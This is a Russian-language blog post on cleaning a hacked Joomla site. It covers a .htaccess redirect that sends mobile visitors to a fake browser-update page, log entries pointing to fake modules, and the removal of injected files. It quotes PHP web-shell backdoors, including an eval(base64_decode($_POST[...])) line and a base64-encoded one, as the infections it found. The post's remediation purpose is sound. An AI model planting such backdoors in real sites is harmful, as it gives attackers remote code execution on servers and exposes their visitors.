Удаляем вирусы с сайта. Вирус в .htaccess

Делал надавно сайт своей подруге. Использовал CMS Joomla (ну нравится она мне), сайт получился неплохой, посещаемости, конечно, пока маловато, ну да ладно. Так вот, все шло отлично пока в один прекрасный момент мне не позвонили и не сказали, что сайт в смартфоне не открывается.

Точнее открывается, но не то, что там должно быть, а всплывает окошко и просит принудительно обновить браузер. А так как браузер подруга недавно обновляла с официального сайта, то заподозрила она неладное.

Вирус в .htaccess - мобильный редирект

Посмотрел я файлы того сайта и в .htaccess обнаружил следующее (Это всего лишь небольшой отрывок из .htaccess, код стоял в самом начале файла):

RewriteEngine on RewriteCond %{HTTP_USER_AGENT} acs [NC,OR] RewriteCond %{HTTP_USER_AGENT} alav [NC,OR] RewriteCond %{HTTP_USER_AGENT} alca [NC,OR] RewriteCond %{HTTP_USER_AGENT} amoi [NC,OR] RewriteCond %{HTTP_USER_AGENT} audi [NC,OR] RewriteCond %{HTTP_USER_AGENT} aste [NC,OR] RewriteCond %{HTTP_USER_AGENT} avan [NC,OR] RewriteCond %{HTTP_USER_AGENT} benq [NC,OR] RewriteCond %{HTTP_USER_AGENT} bird [NC,OR] RewriteCond %{HTTP_USER_AGENT} blac [NC,OR] RewriteCond %{HTTP_USER_AGENT} blaz [NC,OR] RewriteCond %{HTTP_USER_AGENT} brew [NC,OR] RewriteCond %{HTTP_USER_AGENT} cell [NC,OR] RewriteCond %{HTTP_USER_AGENT} cldc [NC,OR] RewriteCond %{HTTP_USER_AGENT} cmd- [NC,OR] RewriteCond %{HTTP_USER_AGENT} eric [NC,OR] RewriteCond %{HTTP_USER_AGENT} hipt [NC,OR] RewriteCond %{HTTP_USER_AGENT} inno [NC,OR] RewriteCond %{HTTP_USER_AGENT} ipaq [NC,OR] RewriteCond %{HTTP_USER_AGENT} java [NC,OR] RewriteCond %{HTTP_USER_AGENT} jigs [NC,OR] RewriteCond %{HTTP_USER_AGENT} kddi [NC,OR] RewriteCond %{HTTP_USER_AGENT} keji [NC,OR] RewriteCond %{HTTP_USER_AGENT} leno [NC,OR] RewriteCond %{HTTP_USER_AGENT} lg-c [NC,OR] RewriteCond %{HTTP_USER_AGENT} lg-d [NC,OR] RewriteCond %{HTTP_USER_AGENT} lg-g [NC,OR] RewriteCond %{HTTP_USER_AGENT} lge- [NC,OR] RewriteCond %{HTTP_USER_AGENT} maui [NC,OR] RewriteCond %{HTTP_USER_AGENT} maxo [NC,OR] RewriteCond %{HTTP_USER_AGENT} midp [NC,OR] RewriteCond %{HTTP_USER_AGENT} mits [NC,OR]

Что делал этот вирус .htaccess? Он перенаправлял всех посетителей с мобильных телефонов на специальныю посадочную страницу, на которой пользователям предлагалось обновить браузер (это в моем случае, а вообще там может быть все, что угодно). Такой вирус не сразу заметишь, ведь не всегда вебмастер заходит на свой сайт со смартфонов, планшетов и т.д. А вот вашим пользователям такое, я думаю, вообще не понравится, и в следующий раз они могут вообще к вам не прийти.

>Как найти и удалить вирус htaccess с сайта?

Удаление всего ненужного из .htaccess не помогло, даже если потом выставлять права 000. Хотя поначалу я думал, что это поможет, но через день-два вирус снова давал о себе знать.

Пришлось залезть в журнал логов. Там оказалось несколько сомнительных строк, например:

146.185.239.19 - - [30/Jun/2014:07:38:13 -0400] "POST /modules/mod_araticlhess/headers.php HTTP/1.1" 302 284 "-" "Python-urllib/2.7"

178.74.246.201 - - [30/Jun/2014:05:08:45 -0400] "POST /administrator/components/com_banners/web-infor.php HTTP/1.1" 200 18028 "http://********/administrator/components/com_banners/web-infor.php" "Mozilla/5.0 (Windows NT 6.1; Trident/4.0; en:16.0) Gecko/20100101 Firefox/16.0"

На проверку оказалось, что модуля с названием >mod_araticlhess или файла >web-infor.php вообще быть не должно. Так что если вы нашли у себя нечто подобное, смело удаляйте, иногда они могут называться >mod_administrator, mod_msn. Речь идет о Joomla, так что ищите все эти фейковые модули в папке >ваш_сайт/modules. Перед какими-либо изменениями на сайте не забывайте делать резервную копию!

Сканнер на вирусы, обнаруженные на вашем сайте

Все проделанное выше, конечно, помогло, но вирус был удален не полностью. Однако, на хостинге Webhost1 (пользуюь этим хостингом уже несколько лет, и только хорошие впечатления) есть так называемый "Сканнер на вирусы". Так вот при подозрении, что на вашем сайте появились вирусы, стоим им воспользоваться.

Для этого достаточно выбрать папку, которую надо просканировать и нажать на кнопку

Вот что он вам выдаст в ответ:

Если на сайте нет вирусов и прочих сомнительных файлов, то красных надписей не будет. Ну, а если же красные надписи появились, то придется вручную просматривать каждый подозрительный файл и удалять оттуда лишний код. В моем случае в зараженные файлы добавлялась такая строчка:

<?php eval(base64_decode($_POST['nf03c87']));?>

Или же создавались абсолютно сторонние файлы, с примерно следующим содержанием:

<?php eval ( base64_decode ("IGlmICggaXNzZXQoICRfQ09PS0lF Wydkd2MnXSkgKSB7IGVjaG8gJzxjd2QJyAuIGdldGN3ZCgpIC4gJz wvY3dkPic7IH0gaWYgKCBpc3NldCAoICRfUE9TVFsncGU4MCddI CkgKSB7IGV2YWwgKCBiYXNlNjRfZGVjb2RlICggJF9QT1NUWydwZ TgwJ10gKSApOyByZXR1cm47IH0gIGlmICggaXNzZXQoICRfQ09P S0lFWydwZTgwJ10pICkgeyBldmFsICggYmFzZTY0X2RlY29kZSAoIC RfQ09PS0lFWydwZTgwJ10gKSApOyByZXR1cm47IH0g") ); ?> <!--e318c732855cb5bd81b12ac251dbe9f6-->

После удаления всех сомнительных файлов и удаления стороннего кода в полезных файлах, вирус на сайте больше не появлялся.

Бесплатный сканер вирусов AI-Bolit

Я им не пользовался, но многие советуют. Вот что он умеет:

- Искать вирусы, вредоносные и хакерские скрипты на хостинге

- шеллы по сигнатурам и гибким паттернам, шеллы на основе несложной эвристики - все то, что обычные антивирусы и сканеры найти не могут

- искать редиректы в >.htaccess на вредоносные сайты и многое другое.

Как мог появиться вирус на сайте?

Скорее всего он загружен либо через уязвимости в CMS или внедрен в какое-то расширение, которое было скачано с недобросовестного сайта. Кстати, я недавно писал статью Немного о безопасноcти Joomla, можете почитать.

Желаю Вам, чтобы Вы не сталкивались с такими проблемами, а если столкнетесь, то знаете, что надо делать. Надеюсь, статья была полезной))